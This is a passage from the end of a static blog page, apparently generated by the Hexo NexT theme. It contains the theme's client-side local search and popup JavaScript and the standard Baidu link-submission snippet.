                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('10');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  

  

  

</body>
</html>
